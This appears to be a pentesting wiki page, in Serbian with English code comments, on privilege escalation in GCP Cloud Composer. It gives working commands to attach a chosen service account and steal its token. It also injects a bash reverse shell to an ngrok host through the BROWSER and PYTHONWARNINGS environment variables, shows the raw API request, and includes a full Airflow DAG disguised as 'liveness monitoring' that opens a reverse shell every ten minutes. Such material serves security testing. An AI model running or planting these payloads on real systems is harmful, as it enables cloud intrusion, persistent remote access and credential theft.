GCP - Composer Privesc

Reading time: 4 minutes

composer

Više informacija u:

GCP - Composer Enum

composer.environments.create

Moguće je priključiti bilo koji servisni nalog na novokreirano composer okruženje sa tom dozvolom. Kasnije možete izvršiti kod unutar composera da biste ukrali token servisnog naloga.

gcloud composer environments create privesc-test \
--project "${PROJECT_ID}" \
--location europe-west1 \
--service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"

Više informacija o eksploataciji ovde.

composer.environments.update

Moguće je ažurirati composer okruženje, na primer, modifikovanjem env varijabli:

# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
projects/<project-id>/locations/<location>/environments/<composer-env-name> \
--update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
--location <location> \
--project <project-id>

# Call the API endpoint directly
PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
Host: composer.googleapis.com
User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Length: 178
Content-Type: application/json
X-Goog-Api-Client: cred-type/sa
Authorization: Bearer [token]
X-Allowed-Locations: 0x0

{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}

TODO: Dobiti RCE dodavanjem novih pypi paketa u okruženje

Preuzmi Dags

Proverite izvorni kod dags-a koji se izvršavaju:

mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags

Uvoz Dags

Dodajte python DAG kod u datoteku i uvezite ga pokretanjem:

# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py

Обратни shell DAG:

import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta

default_args = {
'start_date': airflow.utils.dates.days_ago(0),
'retries': 1,
'retry_delay': timedelta(minutes=5)
}

dag = DAG(
'reverse_shell',
default_args=default_args,
description='liveness monitoring dag',
schedule_interval='*/10 * * * *',
max_active_runs=1,
catchup=False,
dagrun_timeout=timedelta(minutes=10),
)

# priority_weight has type int in Airflow DB, uses the maximum.
t1 = BashOperator(
task_id='bash_rev',
bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
dag=dag,
depends_on_past=False,
priority_weight=2**31 - 1,
do_xcom_push=False)

Write Access to the Composer bucket

Sve komponente okruženja kompozitora (DAG-ovi, dodaci i podaci) se čuvaju unutar GCP bucket-a. Ako napadač ima dozvole za čitanje i pisanje, mogao bi da prati bucket i kada god se DAG kreira ili ažurira, pošalje verziju sa backdoor-om tako da okruženje kompozitora preuzme verziju sa backdoor-om iz skladišta.

Get more info about this attack in:

GCP - Storage Privesc

Import Plugins

TODO: Check what is possible to compromise by uploading plugins

Import Data

TODO: Check what is possible to compromise by uploading data